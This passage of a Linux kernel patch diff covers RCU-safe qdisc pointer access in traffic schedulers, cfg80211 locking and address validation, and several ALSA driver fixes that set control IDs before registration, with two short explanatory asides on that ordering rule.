+ 	    qdisc_qstats_copy(d, sch) < 0)
+ 		return -1;
+diff --git a/net/sched/sch_mqprio.c b/net/sched/sch_mqprio.c
+index 4c68abaa289bd..9f26fb7d5823c 100644
+--- a/net/sched/sch_mqprio.c
++++ b/net/sched/sch_mqprio.c
+@@ -399,7 +399,7 @@ static int mqprio_dump(struct Qdisc *sch, struct sk_buff *skb)
+ 	 * qdisc totals are added at end.
+ 	 */
+ 	for (ntx = 0; ntx < dev->num_tx_queues; ntx++) {
+-		qdisc = netdev_get_tx_queue(dev, ntx)->qdisc_sleeping;
++		qdisc = rtnl_dereference(netdev_get_tx_queue(dev, ntx)->qdisc_sleeping);
+ 		spin_lock_bh(qdisc_lock(qdisc));
+ 
+ 		gnet_stats_add_basic(&sch->bstats, qdisc->cpu_bstats,
+@@ -449,7 +449,7 @@ static struct Qdisc *mqprio_leaf(struct Qdisc *sch, unsigned long cl)
+ 	if (!dev_queue)
+ 		return NULL;
+ 
+-	return dev_queue->qdisc_sleeping;
++	return rtnl_dereference(dev_queue->qdisc_sleeping);
+ }
+ 
+ static unsigned long mqprio_find(struct Qdisc *sch, u32 classid)
+@@ -482,7 +482,7 @@ static int mqprio_dump_class(struct Qdisc *sch, unsigned long cl,
+ 		tcm->tcm_parent = (tc < 0) ? 0 :
+ 			TC_H_MAKE(TC_H_MAJ(sch->handle),
+ 				  TC_H_MIN(tc + TC_H_MIN_PRIORITY));
+-		tcm->tcm_info = dev_queue->qdisc_sleeping->handle;
++		tcm->tcm_info = rtnl_dereference(dev_queue->qdisc_sleeping)->handle;
+ 	} else {
+ 		tcm->tcm_parent = TC_H_ROOT;
+ 		tcm->tcm_info = 0;
+@@ -538,7 +538,7 @@ static int mqprio_dump_class_stats(struct Qdisc *sch, unsigned long cl,
+ 	} else {
+ 		struct netdev_queue *dev_queue = mqprio_queue_get(sch, cl);
+ 
+-		sch = dev_queue->qdisc_sleeping;
++		sch = rtnl_dereference(dev_queue->qdisc_sleeping);
+ 		if (gnet_stats_copy_basic(d, sch->cpu_bstats,
+ 					  &sch->bstats, true) < 0 ||
+ 		    qdisc_qstats_copy(d, sch) < 0)
+diff --git a/net/sched/sch_pie.c b/net/sched/sch_pie.c
+index 265c238047a42..b60b31ef71cc5 100644
+--- a/net/sched/sch_pie.c
++++ b/net/sched/sch_pie.c
+@@ -421,8 +421,10 @@ static void pie_timer(struct timer_list *t)
+ {
+ 	struct pie_sched_data *q = from_timer(q, t, adapt_timer);
+ 	struct Qdisc *sch = q->sch;
+-	spinlock_t *root_lock = qdisc_lock(qdisc_root_sleeping(sch));
++	spinlock_t *root_lock;
+ 
++	rcu_read_lock();
++	root_lock = qdisc_lock(qdisc_root_sleeping(sch));
+ 	spin_lock(root_lock);
+ 	pie_calculate_probability(&q->params, &q->vars, sch->qstats.backlog);
+ 
+@@ -430,6 +432,7 @@ static void pie_timer(struct timer_list *t)
+ 	if (q->params.tupdate)
+ 		mod_timer(&q->adapt_timer, jiffies + q->params.tupdate);
+ 	spin_unlock(root_lock);
++	rcu_read_unlock();
+ }
+ 
+ static int pie_init(struct Qdisc *sch, struct nlattr *opt,
+diff --git a/net/sched/sch_red.c b/net/sched/sch_red.c
+index 98129324e1573..16277b6a0238d 100644
+--- a/net/sched/sch_red.c
++++ b/net/sched/sch_red.c
+@@ -321,12 +321,15 @@ static inline void red_adaptative_timer(struct timer_list *t)
+ {
+ 	struct red_sched_data *q = from_timer(q, t, adapt_timer);
+ 	struct Qdisc *sch = q->sch;
+-	spinlock_t *root_lock = qdisc_lock(qdisc_root_sleeping(sch));
++	spinlock_t *root_lock;
+ 
++	rcu_read_lock();
++	root_lock = qdisc_lock(qdisc_root_sleeping(sch));
+ 	spin_lock(root_lock);
+ 	red_adaptative_algo(&q->parms, &q->vars);
+ 	mod_timer(&q->adapt_timer, jiffies + HZ/2);
+ 	spin_unlock(root_lock);
++	rcu_read_unlock();
+ }
+ 
+ static int red_init(struct Qdisc *sch, struct nlattr *opt,
+diff --git a/net/sched/sch_sfq.c b/net/sched/sch_sfq.c
+index abd436307d6a8..66dcb18638fea 100644
+--- a/net/sched/sch_sfq.c
++++ b/net/sched/sch_sfq.c
+@@ -606,10 +606,12 @@ static void sfq_perturbation(struct timer_list *t)
+ {
+ 	struct sfq_sched_data *q = from_timer(q, t, perturb_timer);
+ 	struct Qdisc *sch = q->sch;
+-	spinlock_t *root_lock = qdisc_lock(qdisc_root_sleeping(sch));
++	spinlock_t *root_lock;
+ 	siphash_key_t nkey;
+ 
+ 	get_random_bytes(&nkey, sizeof(nkey));
++	rcu_read_lock();
++	root_lock = qdisc_lock(qdisc_root_sleeping(sch));
+ 	spin_lock(root_lock);
+ 	q->perturbation = nkey;
+ 	if (!q->filter_list && q->tail)
+@@ -618,6 +620,7 @@ static void sfq_perturbation(struct timer_list *t)
+ 
+ 	if (q->perturb_period)
+ 		mod_timer(&q->perturb_timer, jiffies + q->perturb_period);
++	rcu_read_unlock();
+ }
+ 
+ static int sfq_change(struct Qdisc *sch, struct nlattr *opt)
+diff --git a/net/sched/sch_taprio.c b/net/sched/sch_taprio.c
+index c322a61eaeeac..a274a9332f333 100644
+--- a/net/sched/sch_taprio.c
++++ b/net/sched/sch_taprio.c
+@@ -2050,7 +2050,7 @@ static struct Qdisc *taprio_leaf(struct Qdisc *sch, unsigned long cl)
+ 	if (!dev_queue)
+ 		return NULL;
+ 
+-	return dev_queue->qdisc_sleeping;
++	return rtnl_dereference(dev_queue->qdisc_sleeping);
+ }
+ 
+ static unsigned long taprio_find(struct Qdisc *sch, u32 classid)
+@@ -2069,7 +2069,7 @@ static int taprio_dump_class(struct Qdisc *sch, unsigned long cl,
+ 
+ 	tcm->tcm_parent = TC_H_ROOT;
+ 	tcm->tcm_handle |= TC_H_MIN(cl);
+-	tcm->tcm_info = dev_queue->qdisc_sleeping->handle;
++	tcm->tcm_info = rtnl_dereference(dev_queue->qdisc_sleeping)->handle;
+ 
+ 	return 0;
+ }
+@@ -2081,7 +2081,7 @@ static int taprio_dump_class_stats(struct Qdisc *sch, unsigned long cl,
+ {
+ 	struct netdev_queue *dev_queue = taprio_queue_get(sch, cl);
+ 
+-	sch = dev_queue->qdisc_sleeping;
++	sch = rtnl_dereference(dev_queue->qdisc_sleeping);
+ 	if (gnet_stats_copy_basic(d, NULL, &sch->bstats, true) < 0 ||
+ 	    qdisc_qstats_copy(d, sch) < 0)
+ 		return -1;
+diff --git a/net/sched/sch_teql.c b/net/sched/sch_teql.c
+index 16f9238aa51d1..7721239c185fb 100644
+--- a/net/sched/sch_teql.c
++++ b/net/sched/sch_teql.c
+@@ -297,7 +297,7 @@ restart:
+ 		struct net_device *slave = qdisc_dev(q);
+ 		struct netdev_queue *slave_txq = netdev_get_tx_queue(slave, 0);
+ 
+-		if (slave_txq->qdisc_sleeping != q)
++		if (rcu_access_pointer(slave_txq->qdisc_sleeping) != q)
+ 			continue;
+ 		if (netif_xmit_stopped(netdev_get_tx_queue(slave, subq)) ||
+ 		    !netif_running(slave)) {
+diff --git a/net/smc/smc_llc.c b/net/smc/smc_llc.c
+index 3008dfdf7c55e..760f8bbff822e 100644
+--- a/net/smc/smc_llc.c
++++ b/net/smc/smc_llc.c
+@@ -851,6 +851,8 @@ static int smc_llc_add_link_cont(struct smc_link *link,
+ 	addc_llc->num_rkeys = *num_rkeys_todo;
+ 	n = *num_rkeys_todo;
+ 	for (i = 0; i < min_t(u8, n, SMC_LLC_RKEYS_PER_CONT_MSG); i++) {
++		while (*buf_pos && !(*buf_pos)->used)
++			*buf_pos = smc_llc_get_next_rmb(lgr, buf_lst, *buf_pos);
+ 		if (!*buf_pos) {
+ 			addc_llc->num_rkeys = addc_llc->num_rkeys -
+ 					      *num_rkeys_todo;
+@@ -867,8 +869,6 @@ static int smc_llc_add_link_cont(struct smc_link *link,
+ 
+ 		(*num_rkeys_todo)--;
+ 		*buf_pos = smc_llc_get_next_rmb(lgr, buf_lst, *buf_pos);
+-		while (*buf_pos && !(*buf_pos)->used)
+-			*buf_pos = smc_llc_get_next_rmb(lgr, buf_lst, *buf_pos);
+ 	}
+ 	addc_llc->hd.common.llc_type = SMC_LLC_ADD_LINK_CONT;
+ 	addc_llc->hd.length = sizeof(struct smc_llc_msg_add_link_cont);
+diff --git a/net/wireless/core.c b/net/wireless/core.c
+index 5b0c4d5b80cf5..b3ec9eaec36b3 100644
+--- a/net/wireless/core.c
++++ b/net/wireless/core.c
+@@ -368,12 +368,12 @@ static void cfg80211_sched_scan_stop_wk(struct work_struct *work)
+ 	rdev = container_of(work, struct cfg80211_registered_device,
+ 			   sched_scan_stop_wk);
+ 
+-	rtnl_lock();
++	wiphy_lock(&rdev->wiphy);
+ 	list_for_each_entry_safe(req, tmp, &rdev->sched_scan_req_list, list) {
+ 		if (req->nl_owner_dead)
+ 			cfg80211_stop_sched_scan_req(rdev, req, false);
+ 	}
+-	rtnl_unlock();
++	wiphy_unlock(&rdev->wiphy);
+ }
+ 
+ static void cfg80211_propagate_radar_detect_wk(struct work_struct *work)
+diff --git a/net/wireless/nl80211.c b/net/wireless/nl80211.c
+index 7320d676ce3a5..087c0c442e231 100644
+--- a/net/wireless/nl80211.c
++++ b/net/wireless/nl80211.c
+@@ -10542,6 +10542,8 @@ static int nl80211_authenticate(struct sk_buff *skb, struct genl_info *info)
+ 		if (!info->attrs[NL80211_ATTR_MLD_ADDR])
+ 			return -EINVAL;
+ 		req.ap_mld_addr = nla_data(info->attrs[NL80211_ATTR_MLD_ADDR]);
++		if (!is_valid_ether_addr(req.ap_mld_addr))
++			return -EINVAL;
+ 	}
+ 
+ 	req.bss = cfg80211_get_bss(&rdev->wiphy, chan, bssid, ssid, ssid_len,
+diff --git a/sound/isa/gus/gus_pcm.c b/sound/isa/gus/gus_pcm.c
+index 230f65a0e4b07..388db5fb65bd0 100644
+--- a/sound/isa/gus/gus_pcm.c
++++ b/sound/isa/gus/gus_pcm.c
+@@ -892,10 +892,10 @@ int snd_gf1_pcm_new(struct snd_gus_card *gus, int pcm_dev, int control_index)
+ 		kctl = snd_ctl_new1(&snd_gf1_pcm_volume_control1, gus);
+ 	else
+ 		kctl = snd_ctl_new1(&snd_gf1_pcm_volume_control, gus);
++	kctl->id.index = control_index;
+ 	err = snd_ctl_add(card, kctl);
+ 	if (err < 0)
+ 		return err;
+-	kctl->id.index = control_index;
+ 
+ 	return 0;
+ }
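
This hunk and the cmipci, hda, ice1712, ice1724, aureon, and ymfpci ones
that follow fix the same bug class: kctl->id.device or id.index was
assigned after snd_ctl_add(), but the control may be indexed by its ID
as soon as it is added, so late ID writes are lost to lookups (the hda
hunk uses snd_ctl_rename_id() because its control is already live). A
minimal sketch of the publish-after-init rule, with a hypothetical
registry standing in for the ALSA control list:

#include <stdio.h>
#include <string.h>

struct ctl { char name[32]; int index; };

static struct ctl *registry[16];
static int nr_ctls;

/* registration point: the control is findable from here on, so all of
 * its identifying fields must already be final */
static int ctl_add(struct ctl *c)
{
        if (nr_ctls >= 16)
                return -1;
        registry[nr_ctls++] = c;
        return 0;
}

static int ctl_publish(struct ctl *c, const char *name, int index)
{
        memset(c, 0, sizeof(*c));
        snprintf(c->name, sizeof(c->name), "%s", name);
        c->index = index;       /* set the ID first ... */
        return ctl_add(c);      /* ... then register    */
}

int main(void)
{
        static struct ctl spdif;

        return ctl_publish(&spdif, "IEC958 Playback Default", 1);
}
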
+diff --git a/sound/pci/cmipci.c b/sound/pci/cmipci.c
+index 727db6d433916..6d25c12d9ef00 100644
+--- a/sound/pci/cmipci.c
++++ b/sound/pci/cmipci.c
+@@ -2688,20 +2688,20 @@ static int snd_cmipci_mixer_new(struct cmipci *cm, int pcm_spdif_device)
+ 		}
+ 		if (cm->can_ac3_hw) {
+ 			kctl = snd_ctl_new1(&snd_cmipci_spdif_default, cm);
++			kctl->id.device = pcm_spdif_device;
+ 			err = snd_ctl_add(card, kctl);
+ 			if (err < 0)
+ 				return err;
+-			kctl->id.device = pcm_spdif_device;
+ 			kctl = snd_ctl_new1(&snd_cmipci_spdif_mask, cm);
++			kctl->id.device = pcm_spdif_device;
+ 			err = snd_ctl_add(card, kctl);
+ 			if (err < 0)
+ 				return err;
+-			kctl->id.device = pcm_spdif_device;
+ 			kctl = snd_ctl_new1(&snd_cmipci_spdif_stream, cm);
++			kctl->id.device = pcm_spdif_device;
+ 			err = snd_ctl_add(card, kctl);
+ 			if (err < 0)
+ 				return err;
+-			kctl->id.device = pcm_spdif_device;
+ 		}
+ 		if (cm->chip_version <= 37) {
+ 			sw = snd_cmipci_old_mixer_switches;
+diff --git a/sound/pci/hda/hda_codec.c b/sound/pci/hda/hda_codec.c
+index 9f79c0ac2bda7..bd19f92aeeec8 100644
+--- a/sound/pci/hda/hda_codec.c
++++ b/sound/pci/hda/hda_codec.c
+@@ -2458,10 +2458,14 @@ int snd_hda_create_dig_out_ctls(struct hda_codec *codec,
+ 		   type == HDA_PCM_TYPE_HDMI) {
+ 		/* suppose a single SPDIF device */
+ 		for (dig_mix = dig_mixes; dig_mix->name; dig_mix++) {
++			struct snd_ctl_elem_id id;
++
+ 			kctl = find_mixer_ctl(codec, dig_mix->name, 0, 0);
+ 			if (!kctl)
+ 				break;
+-			kctl->id.index = spdif_index;
++			id = kctl->id;
++			id.index = spdif_index;
++			snd_ctl_rename_id(codec->card, &kctl->id, &id);
+ 		}
+ 		bus->primary_dig_out_type = HDA_PCM_TYPE_HDMI;
+ 	}
+diff --git a/sound/pci/hda/patch_realtek.c b/sound/pci/hda/patch_realtek.c
+index 7b5f194513c7b..48a0e87136f1c 100644
+--- a/sound/pci/hda/patch_realtek.c
++++ b/sound/pci/hda/patch_realtek.c
+@@ -9547,6 +9547,7 @@ static const struct snd_pci_quirk alc269_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x1043, 0x1a8f, "ASUS UX582ZS", ALC245_FIXUP_CS35L41_SPI_2),
+ 	SND_PCI_QUIRK(0x1043, 0x1b11, "ASUS UX431DA", ALC294_FIXUP_ASUS_COEF_1B),
+ 	SND_PCI_QUIRK(0x1043, 0x1b13, "Asus U41SV", ALC269_FIXUP_INV_DMIC),
++	SND_PCI_QUIRK(0x1043, 0x1b93, "ASUS G614JVR/JIR", ALC245_FIXUP_CS35L41_SPI_2),
+ 	SND_PCI_QUIRK(0x1043, 0x1bbd, "ASUS Z550MA", ALC255_FIXUP_ASUS_MIC_NO_PRESENCE),
+ 	SND_PCI_QUIRK(0x1043, 0x1c23, "Asus X55U", ALC269_FIXUP_LIMIT_INT_MIC_BOOST),
+ 	SND_PCI_QUIRK(0x1043, 0x1c62, "ASUS GU603", ALC289_FIXUP_ASUS_GA401),
+@@ -9565,6 +9566,11 @@ static const struct snd_pci_quirk alc269_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x1043, 0x1f12, "ASUS UM5302", ALC287_FIXUP_CS35L41_I2C_2),
+ 	SND_PCI_QUIRK(0x1043, 0x1f92, "ASUS ROG Flow X16", ALC289_FIXUP_ASUS_GA401),
+ 	SND_PCI_QUIRK(0x1043, 0x3030, "ASUS ZN270IE", ALC256_FIXUP_ASUS_AIO_GPIO2),
++	SND_PCI_QUIRK(0x1043, 0x3a20, "ASUS G614JZR", ALC245_FIXUP_CS35L41_SPI_2),
++	SND_PCI_QUIRK(0x1043, 0x3a30, "ASUS G814JVR/JIR", ALC245_FIXUP_CS35L41_SPI_2),
++	SND_PCI_QUIRK(0x1043, 0x3a40, "ASUS G814JZR", ALC245_FIXUP_CS35L41_SPI_2),
++	SND_PCI_QUIRK(0x1043, 0x3a50, "ASUS G834JYR/JZR", ALC245_FIXUP_CS35L41_SPI_2),
++	SND_PCI_QUIRK(0x1043, 0x3a60, "ASUS G634JYR/JZR", ALC245_FIXUP_CS35L41_SPI_2),
+ 	SND_PCI_QUIRK(0x1043, 0x831a, "ASUS P901", ALC269_FIXUP_STEREO_DMIC),
+ 	SND_PCI_QUIRK(0x1043, 0x834a, "ASUS S101", ALC269_FIXUP_STEREO_DMIC),
+ 	SND_PCI_QUIRK(0x1043, 0x8398, "ASUS P1005", ALC269_FIXUP_STEREO_DMIC),
+@@ -9636,6 +9642,7 @@ static const struct snd_pci_quirk alc269_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x1558, 0x5101, "Clevo S510WU", ALC293_FIXUP_SYSTEM76_MIC_NO_PRESENCE),
+ 	SND_PCI_QUIRK(0x1558, 0x5157, "Clevo W517GU1", ALC293_FIXUP_SYSTEM76_MIC_NO_PRESENCE),
+ 	SND_PCI_QUIRK(0x1558, 0x51a1, "Clevo NS50MU", ALC293_FIXUP_SYSTEM76_MIC_NO_PRESENCE),
++	SND_PCI_QUIRK(0x1558, 0x51b1, "Clevo NS50AU", ALC256_FIXUP_SYSTEM76_MIC_NO_PRESENCE),
+ 	SND_PCI_QUIRK(0x1558, 0x5630, "Clevo NP50RNJS", ALC256_FIXUP_SYSTEM76_MIC_NO_PRESENCE),
+ 	SND_PCI_QUIRK(0x1558, 0x70a1, "Clevo NB70T[HJK]", ALC293_FIXUP_SYSTEM76_MIC_NO_PRESENCE),
+ 	SND_PCI_QUIRK(0x1558, 0x70b3, "Clevo NK70SB", ALC293_FIXUP_SYSTEM76_MIC_NO_PRESENCE),
+@@ -11694,6 +11701,7 @@ static const struct snd_pci_quirk alc662_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x103c, 0x8719, "HP", ALC897_FIXUP_HP_HSMIC_VERB),
+ 	SND_PCI_QUIRK(0x103c, 0x872b, "HP", ALC897_FIXUP_HP_HSMIC_VERB),
+ 	SND_PCI_QUIRK(0x103c, 0x873e, "HP", ALC671_FIXUP_HP_HEADSET_MIC2),
++	SND_PCI_QUIRK(0x103c, 0x8768, "HP Slim Desktop S01", ALC671_FIXUP_HP_HEADSET_MIC2),
+ 	SND_PCI_QUIRK(0x103c, 0x877e, "HP 288 Pro G6", ALC671_FIXUP_HP_HEADSET_MIC2),
+ 	SND_PCI_QUIRK(0x103c, 0x885f, "HP 288 Pro G8", ALC671_FIXUP_HP_HEADSET_MIC2),
+ 	SND_PCI_QUIRK(0x1043, 0x1080, "Asus UX501VW", ALC668_FIXUP_HEADSET_MODE),
+@@ -11715,6 +11723,7 @@ static const struct snd_pci_quirk alc662_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x14cd, 0x5003, "USI", ALC662_FIXUP_USI_HEADSET_MODE),
+ 	SND_PCI_QUIRK(0x17aa, 0x1036, "Lenovo P520", ALC662_FIXUP_LENOVO_MULTI_CODECS),
+ 	SND_PCI_QUIRK(0x17aa, 0x1057, "Lenovo P360", ALC897_FIXUP_HEADSET_MIC_PIN),
++	SND_PCI_QUIRK(0x17aa, 0x1064, "Lenovo P3 Tower", ALC897_FIXUP_HEADSET_MIC_PIN),
+ 	SND_PCI_QUIRK(0x17aa, 0x32ca, "Lenovo ThinkCentre M80", ALC897_FIXUP_HEADSET_MIC_PIN),
+ 	SND_PCI_QUIRK(0x17aa, 0x32cb, "Lenovo ThinkCentre M70", ALC897_FIXUP_HEADSET_MIC_PIN),
+ 	SND_PCI_QUIRK(0x17aa, 0x32cf, "Lenovo ThinkCentre M950", ALC897_FIXUP_HEADSET_MIC_PIN),
+diff --git a/sound/pci/ice1712/aureon.c b/sound/pci/ice1712/aureon.c
+index 40a0e00950301..4b59f94ec348f 100644
+--- a/sound/pci/ice1712/aureon.c
++++ b/sound/pci/ice1712/aureon.c
+@@ -1903,11 +1903,12 @@ static int aureon_add_controls(struct snd_ice1712 *ice)
+ 		else {
+ 			for (i = 0; i < ARRAY_SIZE(cs8415_controls); i++) {
+ 				struct snd_kcontrol *kctl;
+-				err = snd_ctl_add(ice->card, (kctl = snd_ctl_new1(&cs8415_controls[i], ice)));
+-				if (err < 0)
+-					return err;
++				kctl = snd_ctl_new1(&cs8415_controls[i], ice);
+ 				if (i > 1)
+ 					kctl->id.device = ice->pcm->device;
++				err = snd_ctl_add(ice->card, kctl);
++				if (err < 0)
++					return err;
+ 			}
+ 		}
+ 	}
+diff --git a/sound/pci/ice1712/ice1712.c b/sound/pci/ice1712/ice1712.c
+index a5241a287851c..3b0c3e70987b9 100644
+--- a/sound/pci/ice1712/ice1712.c
++++ b/sound/pci/ice1712/ice1712.c
+@@ -2371,22 +2371,26 @@ int snd_ice1712_spdif_build_controls(struct snd_ice1712 *ice)
+ 
+ 	if (snd_BUG_ON(!ice->pcm_pro))
+ 		return -EIO;
+-	err = snd_ctl_add(ice->card, kctl = snd_ctl_new1(&snd_ice1712_spdif_default, ice));
++	kctl = snd_ctl_new1(&snd_ice1712_spdif_default, ice);
++	kctl->id.device = ice->pcm_pro->device;
++	err = snd_ctl_add(ice->card, kctl);
+ 	if (err < 0)
+ 		return err;
++	kctl = snd_ctl_new1(&snd_ice1712_spdif_maskc, ice);
+ 	kctl->id.device = ice->pcm_pro->device;
+-	err = snd_ctl_add(ice->card, kctl = snd_ctl_new1(&snd_ice1712_spdif_maskc, ice));
++	err = snd_ctl_add(ice->card, kctl);
+ 	if (err < 0)
+ 		return err;
++	kctl = snd_ctl_new1(&snd_ice1712_spdif_maskp, ice);
+ 	kctl->id.device = ice->pcm_pro->device;
+-	err = snd_ctl_add(ice->card, kctl = snd_ctl_new1(&snd_ice1712_spdif_maskp, ice));
++	err = snd_ctl_add(ice->card, kctl);
+ 	if (err < 0)
+ 		return err;
++	kctl = snd_ctl_new1(&snd_ice1712_spdif_stream, ice);
+ 	kctl->id.device = ice->pcm_pro->device;
+-	err = snd_ctl_add(ice->card, kctl = snd_ctl_new1(&snd_ice1712_spdif_stream, ice));
++	err = snd_ctl_add(ice->card, kctl);
+ 	if (err < 0)
+ 		return err;
+-	kctl->id.device = ice->pcm_pro->device;
+ 	ice->spdif.stream_ctl = kctl;
+ 	return 0;
+ }
+diff --git a/sound/pci/ice1712/ice1724.c b/sound/pci/ice1712/ice1724.c
+index 6fab2ad85bbec..1dc776acd637c 100644
+--- a/sound/pci/ice1712/ice1724.c
++++ b/sound/pci/ice1712/ice1724.c
+@@ -2392,23 +2392,27 @@ static int snd_vt1724_spdif_build_controls(struct snd_ice1712 *ice)
+ 	if (err < 0)
+ 		return err;
+ 
+-	err = snd_ctl_add(ice->card, kctl = snd_ctl_new1(&snd_vt1724_spdif_default, ice));
++	kctl = snd_ctl_new1(&snd_vt1724_spdif_default, ice);
++	kctl->id.device = ice->pcm->device;
++	err = snd_ctl_add(ice->card, kctl);
+ 	if (err < 0)
+ 		return err;
++	kctl = snd_ctl_new1(&snd_vt1724_spdif_maskc, ice);
+ 	kctl->id.device = ice->pcm->device;
+-	err = snd_ctl_add(ice->card, kctl = snd_ctl_new1(&snd_vt1724_spdif_maskc, ice));
++	err = snd_ctl_add(ice->card, kctl);
+ 	if (err < 0)
+ 		return err;
++	kctl = snd_ctl_new1(&snd_vt1724_spdif_maskp, ice);
+ 	kctl->id.device = ice->pcm->device;
+-	err = snd_ctl_add(ice->card, kctl = snd_ctl_new1(&snd_vt1724_spdif_maskp, ice));
++	err = snd_ctl_add(ice->card, kctl);
+ 	if (err < 0)
+ 		return err;
+-	kctl->id.device = ice->pcm->device;
+ #if 0 /* use default only */
+-	err = snd_ctl_add(ice->card, kctl = snd_ctl_new1(&snd_vt1724_spdif_stream, ice));
++	kctl = snd_ctl_new1(&snd_vt1724_spdif_stream, ice);
++	kctl->id.device = ice->pcm->device;
++	err = snd_ctl_add(ice->card, kctl);
+ 	if (err < 0)
+ 		return err;
+-	kctl->id.device = ice->pcm->device;
+ 	ice->spdif.stream_ctl = kctl;
+ #endif
+ 	return 0;
+diff --git a/sound/pci/ymfpci/ymfpci_main.c b/sound/pci/ymfpci/ymfpci_main.c
+index b492c32ce0704..f629b3956a69d 100644
+--- a/sound/pci/ymfpci/ymfpci_main.c
++++ b/sound/pci/ymfpci/ymfpci_main.c
+@@ -1827,20 +1827,20 @@ int snd_ymfpci_mixer(struct snd_ymfpci *chip, int rear_switch)
+ 	if (snd_BUG_ON(!chip->pcm_spdif))
+ 		return -ENXIO;
+ 	kctl = snd_ctl_new1(&snd_ymfpci_spdif_default, chip);
++	kctl->id.device = chip->pcm_spdif->device;
+ 	err = snd_ctl_add(chip->card, kctl);
+ 	if (err < 0)
+ 		return err;
+-	kctl->id.device = chip->pcm_spdif->device;
+ 	kctl = snd_ctl_new1(&snd_ymfpci_spdif_mask, chip);
++	kctl->id.device = chip->pcm_spdif->device;
+ 	err = snd_ctl_add(chip->card, kctl);
+ 	if (err < 0)
+ 		return err;
+-	kctl->id.device = chip->pcm_spdif->device;
+ 	kctl = snd_ctl_new1(&snd_ymfpci_spdif_stream, chip);
++	kctl->id.device = chip->pcm_spdif->device;
+ 	err = snd_ctl_add(chip->card, kctl);
+ 	if (err < 0)
+ 		return err;
+-	kctl->id.device = chip->pcm_spdif->device;
+ 	chip->spdif_pcm_ctl = kctl;
+ 
+ 	/* direct recording source */
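
[Editorial note, not part of the patch above.] The aureon, ice1712, ice1724 and ymfpci hunks all make the same reordering: kctl->id.device is now filled in before snd_ctl_add() instead of after. The motivation given in the corresponding upstream commits is that the control core indexes controls by their complete ID at snd_ctl_add() time (via an Xarray lookup table), so editing the ID afterwards leaves that table stale; snd_ctl_add() also frees the control on error, so the old post-add write was unsafe to begin with. A minimal standalone sketch of the corrected ordering, with hypothetical my_template/chip/card names:

	struct snd_kcontrol *kctl;
	int err;

	kctl = snd_ctl_new1(&my_template, chip);
	if (!kctl)
		return -ENOMEM;
	kctl->id.device = chip->pcm->device;	/* complete the ID first */
	err = snd_ctl_add(card, kctl);		/* core frees kctl on error */
	if (err < 0)
		return err;
	/* do not touch kctl or kctl->id past this point */
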
+diff --git a/sound/soc/codecs/wsa881x.c b/sound/soc/codecs/wsa881x.c
+index 046843b57b038..264ec05a3c675 100644
+--- a/sound/soc/codecs/wsa881x.c
++++ b/sound/soc/codecs/wsa881x.c
+@@ -648,7 +648,6 @@ static struct regmap_config wsa881x_regmap_config = {
+ 	.readable_reg = wsa881x_readable_register,
+ 	.reg_format_endian = REGMAP_ENDIAN_NATIVE,
+ 	.val_format_endian = REGMAP_ENDIAN_NATIVE,
+-	.can_multi_write = true,
+ };
+ 
+ enum {
+diff --git a/sound/soc/codecs/wsa883x.c b/sound/soc/codecs/wsa883x.c
+index 6e9a64c5948e2..b152f4e5c4f2b 100644
+--- a/sound/soc/codecs/wsa883x.c
++++ b/sound/soc/codecs/wsa883x.c
+@@ -950,7 +950,6 @@ static struct regmap_config wsa883x_regmap_config = {
+ 	.writeable_reg = wsa883x_writeable_register,
+ 	.reg_format_endian = REGMAP_ENDIAN_NATIVE,
+ 	.val_format_endian = REGMAP_ENDIAN_NATIVE,
+-	.can_multi_write = true,
+ 	.use_single_read = true,
+ };
+ 
+diff --git a/sound/soc/generic/simple-card-utils.c b/sound/soc/generic/simple-card-utils.c
+index be69bbc47f813..8811321717fbb 100644
+--- a/sound/soc/generic/simple-card-utils.c
++++ b/sound/soc/generic/simple-card-utils.c
+@@ -335,7 +335,7 @@ int asoc_simple_startup(struct snd_pcm_substream *substream)
+ 		}
+ 		ret = snd_pcm_hw_constraint_minmax(substream->runtime, SNDRV_PCM_HW_PARAM_RATE,
+ 			fixed_rate, fixed_rate);
+-		if (ret)
++		if (ret < 0)
+ 			goto codec_err;
+ 	}
+ 
+diff --git a/sound/soc/mediatek/mt8195/mt8195-afe-clk.c b/sound/soc/mediatek/mt8195/mt8195-afe-clk.c
+index 9ca2cb8c8a9c2..f35318ae07392 100644
+--- a/sound/soc/mediatek/mt8195/mt8195-afe-clk.c
++++ b/sound/soc/mediatek/mt8195/mt8195-afe-clk.c
+@@ -410,11 +410,6 @@ int mt8195_afe_init_clock(struct mtk_base_afe *afe)
+ 	return 0;
+ }
+ 
+-void mt8195_afe_deinit_clock(struct mtk_base_afe *afe)
+-{
+-	mt8195_audsys_clk_unregister(afe);
+-}
+-
+ int mt8195_afe_enable_clk(struct mtk_base_afe *afe, struct clk *clk)
+ {
+ 	int ret;
+diff --git a/sound/soc/mediatek/mt8195/mt8195-afe-clk.h b/sound/soc/mediatek/mt8195/mt8195-afe-clk.h
+index 40663e31becd1..a08c0ee6c8602 100644
+--- a/sound/soc/mediatek/mt8195/mt8195-afe-clk.h
++++ b/sound/soc/mediatek/mt8195/mt8195-afe-clk.h
+@@ -101,7 +101,6 @@ int mt8195_afe_get_mclk_source_clk_id(int sel);
+ int mt8195_afe_get_mclk_source_rate(struct mtk_base_afe *afe, int apll);
+ int mt8195_afe_get_default_mclk_source_by_rate(int rate);
+ int mt8195_afe_init_clock(struct mtk_base_afe *afe);
+-void mt8195_afe_deinit_clock(struct mtk_base_afe *afe);
+ int mt8195_afe_enable_clk(struct mtk_base_afe *afe, struct clk *clk);
+ void mt8195_afe_disable_clk(struct mtk_base_afe *afe, struct clk *clk);
+ int mt8195_afe_prepare_clk(struct mtk_base_afe *afe, struct clk *clk);
+diff --git a/sound/soc/mediatek/mt8195/mt8195-afe-pcm.c b/sound/soc/mediatek/mt8195/mt8195-afe-pcm.c
+index 72b2c6d629b93..03dabc056b916 100644
+--- a/sound/soc/mediatek/mt8195/mt8195-afe-pcm.c
++++ b/sound/soc/mediatek/mt8195/mt8195-afe-pcm.c
+@@ -3253,18 +3253,13 @@ err_pm_put:
+ 	return ret;
+ }
+ 
+-static int mt8195_afe_pcm_dev_remove(struct platform_device *pdev)
++static void mt8195_afe_pcm_dev_remove(struct platform_device *pdev)
+ {
+-	struct mtk_base_afe *afe = platform_get_drvdata(pdev);
+-
+ 	snd_soc_unregister_component(&pdev->dev);
+ 
+ 	pm_runtime_disable(&pdev->dev);
+ 	if (!pm_runtime_status_suspended(&pdev->dev))
